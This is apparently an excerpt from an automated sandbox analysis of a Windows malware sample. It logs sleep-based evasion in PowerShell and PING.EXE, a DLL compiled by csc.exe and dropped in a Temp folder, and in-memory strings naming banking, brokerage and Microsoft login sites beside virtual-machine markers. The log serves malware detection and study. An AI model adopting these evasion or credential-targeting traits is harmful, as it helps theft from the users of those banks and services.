Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598987	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597306	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 594516	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4970	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4899	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 9999	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Window / User API: threadDelayed 2057	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Window / User API: threadDelayed 7779	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5972	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6784	Thread sleep count: 2057 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6784	Thread sleep count: 7779 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -599780s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -598987s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -597859s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -597641s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -597306s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -596953s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -596391s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -595844s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -595719s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -595391s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 6760	Thread sleep time: -594516s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1636	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2192	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598987	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597306	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Thread delayed: delay time: 594516	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: svchost.exe, 0000000C.00000002.2861106018.000002194382B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@\|
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: svchost.exe, 0000000C.00000002.2861851391.0000021948E57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: powershell.exe, 00000002.00000002.991277571.000001BEBE981000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: xqeMUGRsN
Source: powershell.exe, 00000002.00000002.991277571.000001BEBE981000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: xqeMUGRsM
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: PING.EXE, 00000008.00000002.3327316905.0000000000798000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
